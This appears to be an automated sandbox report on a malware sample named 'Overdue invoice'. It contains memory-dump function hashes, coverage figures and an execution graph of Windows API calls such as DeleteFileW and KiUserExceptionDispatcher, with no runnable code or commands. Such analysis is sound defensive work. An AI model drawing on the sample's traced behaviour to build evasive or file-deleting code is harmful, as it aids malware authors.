                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c5bea245ed5d80a2a4368abdeda454c043aeab32874a0c68ef08be04c5ded72
                                                                          • Instruction ID: cf292f9b238bcd1f4d7112f35409cbc8b754657e877c8b2824f873cbfe4847a5
                                                                          • Opcode Fuzzy Hash: 9c5bea245ed5d80a2a4368abdeda454c043aeab32874a0c68ef08be04c5ded72
                                                                          • Instruction Fuzzy Hash: 63418675E05249DFCB04CFE9D9806AEBBF2EB89300F10D86AC419B7264E7785A05CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07269625 Relevance: .1, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d7757471365fa5b516c8779daedb23a9a5fe470fa6c5c36638317e7345a7173c
                                                                          • Instruction ID: 080bd20e354434bc3b3bb913841ff24923adf240029571a9dc47614a41030ee5
                                                                          • Opcode Fuzzy Hash: d7757471365fa5b516c8779daedb23a9a5fe470fa6c5c36638317e7345a7173c
                                                                          • Instruction Fuzzy Hash: 93417FB1E056588BDB19CF6B8D4539AFBF3BFC9300F14C1BA844CA6255DB3409858F51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07269648 Relevance: .1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 75be52cce964e4702e133192c68580de1bb0f2a69d927d3871356e666883f101
                                                                          • Instruction ID: b124d81a72977ce50470259b7a88c68160e35f9f42b736acf680d5499cd0929e
                                                                          • Opcode Fuzzy Hash: 75be52cce964e4702e133192c68580de1bb0f2a69d927d3871356e666883f101
                                                                          • Instruction Fuzzy Hash: 924171B1E116188BDB28CF6B8D4539EFBF7BFC8300F14C1BA854CA6254EB340A858E11
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 072688D8 Relevance: .1, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 00bd52ed50596be17770e2e04b8c3e5086370f199bb395a9cc0b996e5925dbb7
                                                                          • Instruction ID: 9c281ccfaf0e9c4d79cac2a1113a32e57dd6ff6cf428d82db6beac13913ab1cd
                                                                          • Opcode Fuzzy Hash: 00bd52ed50596be17770e2e04b8c3e5086370f199bb395a9cc0b996e5925dbb7
                                                                          • Instruction Fuzzy Hash: DB41F6B4E1520ADFDB04CFA9C5845EEFBF2BB89210F24C16AC405A7344E6345A828B55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 072688E8 Relevance: .1, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 93204a3f2396a6b1a83945025883cab8b839a921e4fdc8185d3990085fa1d1ba
                                                                          • Instruction ID: dfe274be3a7e39132e1c3d9bebeda7389638cd7a693e82025f1907979ac54d69
                                                                          • Opcode Fuzzy Hash: 93204a3f2396a6b1a83945025883cab8b839a921e4fdc8185d3990085fa1d1ba
                                                                          • Instruction Fuzzy Hash: A641E6B4E1520ADBCB04CFAAC5845AEFBF2AB89310F24C16AC415B7344E7349A818F95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07268458 Relevance: .1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c9024854c772112a5dcca9ef7ee4f3a1c376e48cfd0c43004f67f9233b108b65
                                                                          • Instruction ID: 864c6a58aeb5a098a98be3621a9725d5cdbb644a05b34cbe8f0b522343fa441e
                                                                          • Opcode Fuzzy Hash: c9024854c772112a5dcca9ef7ee4f3a1c376e48cfd0c43004f67f9233b108b65
                                                                          • Instruction Fuzzy Hash: 0041F8B0E1520A9FCB44CFAAC4845EEFBF2BF89300F14C16AC415A7254D7349A828F65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07268468 Relevance: .1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d1beae4a6f9ff40172290d3321ea4ed7f0cbc46b1570322a21ddf4a4d4737584
                                                                          • Instruction ID: ab001b219c977680256151dc1449cb1fd32fabba23d6987b730c4d366096ba52
                                                                          • Opcode Fuzzy Hash: d1beae4a6f9ff40172290d3321ea4ed7f0cbc46b1570322a21ddf4a4d4737584
                                                                          • Instruction Fuzzy Hash: C241C5B4E2020A9FCB04CFAAC5845EEFBF6BF88300F24C56AC415B7254E7749A818F55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0726E078 Relevance: .1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f8a91cfdc3b1a30db813fe9a9e70b509410b005810c06e8824f86a4676b6bed6
                                                                          • Instruction ID: 3af12eb0c96f6de019f2bf439139d6d205e7b67d5feba18f54479f2f763087c7
                                                                          • Opcode Fuzzy Hash: f8a91cfdc3b1a30db813fe9a9e70b509410b005810c06e8824f86a4676b6bed6
                                                                          • Instruction Fuzzy Hash: 073183B0E2121ACBDF18CF9AD9847DEF7B6FBC8200F51C4AAD509A7204DB314A818F51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07263758 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ef78dd40a21881ebac483e99c382b6b29f07738f380aeaeb488f5dd93a3b242d
                                                                          • Instruction ID: b85be091741536aa47324cbc71a90adf4a55ac238cfe85245210e81d6845aa08
                                                                          • Opcode Fuzzy Hash: ef78dd40a21881ebac483e99c382b6b29f07738f380aeaeb488f5dd93a3b242d
                                                                          • Instruction Fuzzy Hash: 7C2108B1E106189BEB18CFABDC44A9EFBF7AFC9200F14C1BAD408A7254DB305A418F51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07263751 Relevance: .1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2b8be6424249d74fddecad7869619a486cee0a8a977e812ace6301a5975c67ec
                                                                          • Instruction ID: 24de0982cdc416c2444fb3e733c72d6cb6a10ccc93aa67db808fba1b1d65ecdf
                                                                          • Opcode Fuzzy Hash: 2b8be6424249d74fddecad7869619a486cee0a8a977e812ace6301a5975c67ec
                                                                          • Instruction Fuzzy Hash: A211ECB1E106189BEB1CCFABD8446DEFAF7AFC8200F08C07AD808A6258EB3405418E51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07268AA1 Relevance: .1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d0783e792499e7b0990ed11a55246232c25e923b4dfc12ab4ed2226fd01c957a
                                                                          • Instruction ID: 1e33546675c334030628f2f5df60060e8ed7b141a2d8d9ea0695499d359fa8c2
                                                                          • Opcode Fuzzy Hash: d0783e792499e7b0990ed11a55246232c25e923b4dfc12ab4ed2226fd01c957a
                                                                          • Instruction Fuzzy Hash: 0B11D0B1E116589BEB18CF6BD8447DEFAF3AFC8200F08C17AC808A6254EB3445428F11
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:20.3%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:285
                                                                          Total number of Limit Nodes:3
                                                                          execution_graph 35075 64e60dc 35077 64e60e4 35075->35077 35076 64e6246 35080 64e6250 35077->35080 35085 64e6260 35077->35085 35081 64e626e 35080->35081 35082 64e6291 35080->35082 35081->35076 35084 64e62b6 35082->35084 35090 64e57bc 35082->35090 35084->35076 35086 64e626e 35085->35086 35087 64e6291 35085->35087 35086->35076 35088 64e57bc DeleteFileW 35087->35088 35089 64e62b6 35087->35089 35088->35089 35089->35076 35091 64e6430 DeleteFileW 35090->35091 35093 64e64af 35091->35093 35093->35084 35094 64e611d 35096 64e6125 35094->35096 35095 64e6246 35097 64e6250 DeleteFileW 35096->35097 35098 64e6260 DeleteFileW 35096->35098 35097->35095 35098->35095 34705 16d4560 34706 16d4574 34705->34706 34709 16d47aa 34706->34709 34707 16d457d 34710 16d47b3 34709->34710 34715 16d498c 34709->34715 34719 16d4890 34709->34719 34723 16d4880 34709->34723 34727 16d49a6 34709->34727 34710->34707 34716 16d493f 34715->34716 34716->34715 34717 16d49cb 34716->34717 34731 16d4c88 34716->34731 34720 16d48d4 34719->34720 34721 16d49cb 34720->34721 34722 16d4c88 2 API calls 34720->34722 34722->34721 34724 16d4891 34723->34724 34725 16d49cb 34724->34725 34726 16d4c88 2 API calls 34724->34726 34726->34725 34728 16d49b9 34727->34728 34729 16d49cb 34727->34729 34730 16d4c88 2 API calls 34728->34730 34730->34729 34732 16d4ca6 34731->34732 34736 16d4ce8 34732->34736 34740 16d4cdb 34732->34740 34733 16d4cb6 34733->34717 34737 16d4d22 34736->34737 34738 16d4d4c RtlEncodePointer 34737->34738 34739 16d4d75 34737->34739 34738->34739 34739->34733 34741 16d4d46 RtlEncodePointer 34740->34741 34744 16d4ce2 34740->34744 34743 16d4d75 34741->34743 34743->34733 34744->34743 34745 16d4d4c RtlEncodePointer 34744->34745 34745->34743 35099 16dadf0 35100 16dae0e 35099->35100 35103 16d9c7c 35100->35103 35102 16dae45 35104 16dc910 LoadLibraryA 35103->35104 35106 16dc9ec 35104->35106 34746 64e65e0 34747 64e65e9 34746->34747 34748 64e66d9 34747->34748 34751 64e66df 34747->34751 34802 64e66f0 34747->34802 34752 64e66f0 34751->34752 34753 64e6737 34752->34753 34853 64e7b4b 34752->34853 34857 64e7cb1 34752->34857 34861 64e7f33 34752->34861 34865 64e79b3 34752->34865 34869 64e7536 34752->34869 34875 64e7d39 34752->34875 34879 64e75bb 34752->34879 34885 64e7925 34752->34885 34889 64e7c29 34752->34889 34893 64e74a8 34752->34893 34899 64e812d 34752->34899 34903 64e77ac 34752->34903 34909 64e8011 34752->34909 34913 64e7690 34752->34913 34919 64e7b95 34752->34919 34923 64e7897 34752->34923 34927 64e8099 34752->34927 34931 64e7e9f 34752->34931 34935 64e771e 34752->34935 34941 64e7d83 34752->34941 34945 64e7602 34752->34945 34951 64e7b04 34752->34951 34955 64e7e0b 34752->34955 34959 64e77f3 34752->34959 34965 64e79fa 34752->34965 34969 64e7f7d 34752->34969 34973 64e757d 34752->34973 34979 64e7a7f 34752->34979 34983 64e7461 34752->34983 34989 64e80e3 34752->34989 34993 64e7765 34752->34993 34999 64e7c67 34752->34999 35003 64e7ee9 34752->35003 35007 64e796c 34752->35007 35011 64e7cef 34752->35011 35015 64e74ef 34752->35015 35021 64e7850 34752->35021 35025 64e7e55 34752->35025 35029 64e76d7 34752->35029 35035 64e805b 34752->35035 35039 64e7bdf 34752->35039 35043 64e78de 34752->35043 35047 64e7a41 34752->35047 35051 64e7dc1 34752->35051 35055 64e7440 34752->35055 35061 64e7fc7 34752->35061 35065 64e7ac6 34752->35065 35069 64e7649 34752->35069 34803 64e670f 34802->34803 34804 64e6737 34803->34804 34805 64e7b4b KiUserExceptionDispatcher 34803->34805 34806 64e7649 2 API calls 34803->34806 34807 64e7ac6 KiUserExceptionDispatcher 34803->34807 34808 64e7fc7 KiUserExceptionDispatcher 34803->34808 34809 64e7440 2 API calls 34803->34809 34810 64e7dc1 KiUserExceptionDispatcher 34803->34810 34811 64e7a41 KiUserExceptionDispatcher 34803->34811 34812 64e78de KiUserExceptionDispatcher 34803->34812 34813 64e7bdf KiUserExceptionDispatcher 34803->34813 34814 64e805b KiUserExceptionDispatcher 34803->34814 34815 64e76d7 2 API calls 34803->34815 34816 64e7e55 KiUserExceptionDispatcher 34803->34816 34817 64e7850 KiUserExceptionDispatcher 34803->34817 34818 64e74ef 2 API calls 34803->34818 34819 64e7cef KiUserExceptionDispatcher 34803->34819 34820 64e796c KiUserExceptionDispatcher 34803->34820 34821 64e7ee9 KiUserExceptionDispatcher 34803->34821 34822 64e7c67 KiUserExceptionDispatcher 34803->34822 34823 64e7765 2 API calls 34803->34823 34824 64e80e3 KiUserExceptionDispatcher 34803->34824 34825 64e7461 2 API calls 34803->34825 34826 64e7a7f KiUserExceptionDispatcher 34803->34826 34827 64e757d 2 API calls 34803->34827 34828 64e7f7d KiUserExceptionDispatcher 34803->34828 34829 64e79fa KiUserExceptionDispatcher 34803->34829 34830 64e77f3 2 API calls 34803->34830 34831 64e7e0b KiUserExceptionDispatcher 34803->34831 34832 64e7b04 KiUserExceptionDispatcher 34803->34832 34833 64e7602 2 API calls 34803->34833 34834 64e7d83 KiUserExceptionDispatcher 34803->34834 34835 64e771e 2 API calls 34803->34835 34836 64e7e9f KiUserExceptionDispatcher 34803->34836 34837 64e8099 KiUserExceptionDispatcher 34803->34837 34838 64e7897 KiUserExceptionDispatcher 34803->34838 34839 64e7b95 KiUserExceptionDispatcher 34803->34839 34840 64e7690 2 API calls 34803->34840 34841 64e8011 KiUserExceptionDispatcher 34803->34841 34842 64e77ac 2 API calls 34803->34842 34843 64e812d KiUserExceptionDispatcher 34803->34843 34844 64e74a8 2 API calls 34803->34844 34845 64e7c29 KiUserExceptionDispatcher 34803->34845 34846 64e7925 KiUserExceptionDispatcher 34803->34846 34847 64e75bb 2 API calls 34803->34847 34848 64e7d39 KiUserExceptionDispatcher 34803->34848 34849 64e7536 2 API calls 34803->34849 34850 64e79b3 KiUserExceptionDispatcher 34803->34850 34851 64e7f33 KiUserExceptionDispatcher 34803->34851 34852 64e7cb1 KiUserExceptionDispatcher 34803->34852 34805->34804 34806->34804 34807->34804 34808->34804 34809->34804 34810->34804 34811->34804 34812->34804 34813->34804 34814->34804 34815->34804 34816->34804 34817->34804 34818->34804 34819->34804 34820->34804 34821->34804 34822->34804 34823->34804 34824->34804 34825->34804 34826->34804 34827->34804 34828->34804 34829->34804 34830->34804 34831->34804 34832->34804 34833->34804 34834->34804 34835->34804 34836->34804 34837->34804 34838->34804 34839->34804 34840->34804 34841->34804 34842->34804 34843->34804 34844->34804 34845->34804 34846->34804 34847->34804 34848->34804 34849->34804 34850->34804 34851->34804 34852->34804 34854 64e7b5d KiUserExceptionDispatcher 34853->34854 34856 64e8175 34854->34856 34856->34753 34858 64e7cc3 KiUserExceptionDispatcher 34857->34858 34860 64e8175 34858->34860 34860->34753 34862 64e7f45 KiUserExceptionDispatcher 34861->34862 34864 64e8175 34862->34864 34864->34753 34866 64e79c5 KiUserExceptionDispatcher 34865->34866 34868 64e8175 34866->34868 34868->34753 34870 64e7548 34869->34870 34871 64e7819 KiUserExceptionDispatcher 34870->34871 34872 64e7835 KiUserExceptionDispatcher 34871->34872 34874 64e8175 34872->34874 34874->34753 34876 64e7d4b KiUserExceptionDispatcher 34875->34876 34878 64e8175 34876->34878 34878->34753 34880 64e75cd 34879->34880 34881 64e7819 KiUserExceptionDispatcher 34880->34881 34882 64e7835 KiUserExceptionDispatcher 34881->34882 34884 64e8175 34882->34884 34884->34753 34886 64e7937 KiUserExceptionDispatcher 34885->34886 34888 64e8175 34886->34888 34888->34753 34890 64e7c3b KiUserExceptionDispatcher 34889->34890 34892 64e8175 34890->34892 34892->34753 34894 64e74ba 34893->34894 34895 64e7819 KiUserExceptionDispatcher 34894->34895 34896 64e7835 KiUserExceptionDispatcher 34895->34896 34898 64e8175 34896->34898 34898->34753 34900 64e813f KiUserExceptionDispatcher 34899->34900 34902 64e8175 34900->34902 34902->34753 34904 64e77be KiUserExceptionDispatcher 34903->34904 34906 64e7835 KiUserExceptionDispatcher 34904->34906 34908 64e8175 34906->34908 34908->34753 34910 64e8023 KiUserExceptionDispatcher 34909->34910 34912 64e8175 34910->34912 34912->34753 34914 64e76a2 34913->34914 34915 64e7819 KiUserExceptionDispatcher 34914->34915 34916 64e7835 KiUserExceptionDispatcher 34915->34916 34918 64e8175 34916->34918 34918->34753 34920 64e7ba7 KiUserExceptionDispatcher 34919->34920 34922 64e8175 34920->34922 34922->34753 34924 64e78a9 KiUserExceptionDispatcher 34923->34924 34926 64e8175 34924->34926 34926->34753 34928 64e80ab KiUserExceptionDispatcher 34927->34928 34930 64e8175 34928->34930 34930->34753 34932 64e7eb1 KiUserExceptionDispatcher 34931->34932 34934 64e8175 34932->34934 34934->34753 34936 64e7730 KiUserExceptionDispatcher 34935->34936 34938 64e7835 KiUserExceptionDispatcher 34936->34938 34940 64e8175 34938->34940 34940->34753 34942 64e7d95 KiUserExceptionDispatcher 34941->34942 34944 64e8175 34942->34944 34944->34753 34946 64e7614 34945->34946 34947 64e7819 KiUserExceptionDispatcher 34946->34947 34948 64e7835 KiUserExceptionDispatcher 34947->34948 34950 64e8175 34948->34950 34950->34753 34952 64e7b16 KiUserExceptionDispatcher 34951->34952 34954 64e8175 34952->34954 34954->34753 34956 64e7e1d KiUserExceptionDispatcher 34955->34956 34958 64e8175 34956->34958 34958->34753 34960 64e7805 KiUserExceptionDispatcher 34959->34960 34962 64e7835 KiUserExceptionDispatcher 34960->34962 34964 64e8175 34962->34964 34964->34753 34966 64e7a0c KiUserExceptionDispatcher 34965->34966 34968 64e8175 34966->34968 34968->34753 34970 64e7f8f KiUserExceptionDispatcher 34969->34970 34972 64e8175 34970->34972 34972->34753 34974 64e758f 34973->34974 34975 64e7819 KiUserExceptionDispatcher 34974->34975 34976 64e7835 KiUserExceptionDispatcher 34975->34976 34978 64e8175 34976->34978 34978->34753 34980 64e7a91 KiUserExceptionDispatcher 34979->34980 34982 64e8175 34980->34982 34982->34753 34984 64e7473 34983->34984 34985 64e7819 KiUserExceptionDispatcher 34984->34985 34986 64e7835 KiUserExceptionDispatcher 34985->34986 34988 64e8175 34986->34988 34988->34753 34990 64e80f5 KiUserExceptionDispatcher 34989->34990 34992 64e8175 34990->34992 34992->34753 34994 64e7777 KiUserExceptionDispatcher 34993->34994 34996 64e7835 KiUserExceptionDispatcher 34994->34996 34998 64e8175 34996->34998 34998->34753 35000 64e7c79 KiUserExceptionDispatcher 34999->35000 35002 64e8175 35000->35002 35002->34753 35004 64e7efb KiUserExceptionDispatcher 35003->35004 35006 64e8175 35004->35006 35006->34753 35008 64e797e KiUserExceptionDispatcher 35007->35008 35010 64e8175 35008->35010 35010->34753 35012 64e7d01 KiUserExceptionDispatcher 35011->35012 35014 64e8175 35012->35014 35014->34753 35016 64e7501 35015->35016 35017 64e7819 KiUserExceptionDispatcher 35016->35017 35018 64e7835 KiUserExceptionDispatcher 35017->35018 35020 64e8175 35018->35020 35020->34753 35022 64e7862 KiUserExceptionDispatcher 35021->35022 35024 64e8175 35022->35024 35024->34753 35026 64e7e67 KiUserExceptionDispatcher 35025->35026 35028 64e8175 35026->35028 35028->34753 35030 64e76e9 35029->35030 35031 64e7819 KiUserExceptionDispatcher 35030->35031 35032 64e7835 KiUserExceptionDispatcher 35031->35032 35034 64e8175 35032->35034 35034->34753 35036 64e806d KiUserExceptionDispatcher 35035->35036 35038 64e8175 35036->35038 35038->34753 35040 64e7bf1 KiUserExceptionDispatcher 35039->35040 35042 64e8175 35040->35042 35042->34753 35044 64e78f0 KiUserExceptionDispatcher 35043->35044 35046 64e8175 35044->35046 35046->34753 35048 64e7a53 KiUserExceptionDispatcher 35047->35048 35050 64e8175 35048->35050 35050->34753 35052 64e7dd3 KiUserExceptionDispatcher 35051->35052 35054 64e8175 35052->35054 35054->34753 35056 64e7446 35055->35056 35057 64e7819 KiUserExceptionDispatcher 35056->35057 35058 64e7835 KiUserExceptionDispatcher 35057->35058 35060 64e8175 35058->35060 35060->34753 35062 64e7fd9 KiUserExceptionDispatcher 35061->35062 35064 64e8175 35062->35064 35064->34753 35066 64e7ad8 KiUserExceptionDispatcher 35065->35066 35068 64e8175 35066->35068 35068->34753 35070 64e765b 35069->35070 35071 64e7819 KiUserExceptionDispatcher 35070->35071 35072 64e7835 KiUserExceptionDispatcher 35071->35072 35074 64e8175 35072->35074 35074->34753

                                                                          Executed Functions

                                                                          Function 06C6ACA8 Relevance: 2.9, Instructions: 2883COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2da8ae200629f0203db4c90ae1ddcfa3e922fded071532ae981f2e5b57677302
                                                                          • Instruction ID: caeed957685b5d8ec2414ff0f4c7be03bc73fff11f4ce4eddf57b8dc94092c5b
                                                                          • Opcode Fuzzy Hash: 2da8ae200629f0203db4c90ae1ddcfa3e922fded071532ae981f2e5b57677302
                                                                          • Instruction Fuzzy Hash: 38631D31D10B198ECB51EF69C984699F7B1FF99300F11C69AE459B7221EB70AAC4CF81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C66BF0 Relevance: .7, Instructions: 726COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 15d619cb8fe0534b41a53436f842952377895c68c0dc2f72783e8feceade7aa6
                                                                          • Instruction ID: a0deabec80582048e2d125890951fdc266a416dbcca6d54d15e4963c6a094a54
                                                                          • Opcode Fuzzy Hash: 15d619cb8fe0534b41a53436f842952377895c68c0dc2f72783e8feceade7aa6
                                                                          • Instruction Fuzzy Hash: F9428B30E002049FDB64EB75D898B6EB6E3EF85748F14C92DE4069B380DB75AD41CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A1C8 Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 6c6a1c8-6c6a1eb 1 6c6a22d-6c6a22f 0->1 2 6c6a1ed-6c6a1f2 0->2 3 6c6a231-6c6a237 1->3 4 6c6a239-6c6a24d 1->4 5 6c6a413 2->5 6 6c6a1f8-6c6a1fb 2->6 7 6c6a26e-6c6a270 3->7 23 6c6a24f-6c6a253 4->23 24 6c6a268 4->24 9 6c6a418-6c6a422 5->9 8 6c6a201-6c6a207 6->8 6->9 12 6c6a272-6c6a277 7->12 13 6c6a279-6c6a282 7->13 8->1 11 6c6a209-6c6a228 8->11 29 6c6a33d-6c6a351 11->29 12->13 14 6c6a2dc-6c6a2df 12->14 21 6c6a284-6c6a28d 13->21 22 6c6a292-6c6a2a4 13->22 14->5 16 6c6a2e5-6c6a2e8 14->16 16->9 20 6c6a2ee-6c6a2f4 16->20 26 6c6a2f6-6c6a313 20->26 27 6c6a315-6c6a326 20->27 21->27 22->5 33 6c6a2aa-6c6a2ad 22->33 23->24 28 6c6a255-6c6a266 23->28 24->7 26->27 27->29 38 6c6a328-6c6a337 27->38 28->7 28->24 44 6c6a358-6c6a3ef call 6c65f38 29->44 33->9 37 6c6a2b3-6c6a2b9 33->37 37->27 40 6c6a2bb-6c6a2da 37->40 38->29 40->27 51 6c6a3f7-6c6a3fd 44->51 52 6c6a3f1-6c6a3f5 44->52 54 6c6a407-6c6a410 51->54 52->51 53 6c6a3ff-6c6a405 52->53 53->54
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \$\$\
                                                                          • API String ID: 0-3791832595
                                                                          • Opcode ID: 9c475e0fe0f9058abea531b79e51544ea11623777bddcc805a68fe1d2a263b3b
                                                                          • Instruction ID: 24defda6dbd8ea261bea52eb9ed5816d323041b77d29ff0d6af713caac961726
                                                                          • Opcode Fuzzy Hash: 9c475e0fe0f9058abea531b79e51544ea11623777bddcc805a68fe1d2a263b3b
                                                                          • Instruction Fuzzy Hash: E0519131B003108FDB649BB698D437E72A2AB84754F24953DE81AAB384EB75DC418794
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7440 Relevance: 3.3, APIs: 2, Instructions: 347COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 56 64e7440 200 64e7440 call 6c65a60 56->200 201 64e7440 call 6c65ac1 56->201 57 64e7446-64e7487 202 64e7487 call 6c66bf0 57->202 203 64e7487 call 6c66c9e 57->203 60 64e748d-64e7515 204 64e7515 call 6c68ea3 60->204 205 64e7515 call 6c68f00 60->205 206 64e7515 call 6c68f5f 60->206 207 64e7515 call 6c68efb 60->207 208 64e7515 call 6c68e0b 60->208 66 64e751b-64e759a 209 64e759a call 6c6914b 66->209 210 64e759a call 6c69158 66->210 72 64e75a0-64e7628 211 64e7628 call 6c69657 72->211 212 64e7628 call 6c69660 72->212 78 64e762e-64e766f 213 64e766f call 6c69823 78->213 214 64e766f call 6c69828 78->214 81 64e7675-64e76b6 215 64e76b6 call 6c6a423 81->215 216 64e76b6 call 6c6a430 81->216 217 64e76b6 call 6c6a42b 81->217 84 64e76bc-64e76fd 218 64e76fd call 6c6a860 84->218 219 64e76fd call 6c6a85b 84->219 220 64e76fd call 6c6a8e9 84->220 87 64e7703-64e816e KiUserExceptionDispatcher * 2 198 64e8175-64e81ad 87->198 200->57 201->57 202->60 203->60 204->66 205->66 206->66 207->66 208->66 209->72 210->72 211->78 212->78 213->81 214->81 215->84 216->84 217->84 218->87 219->87 220->87
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
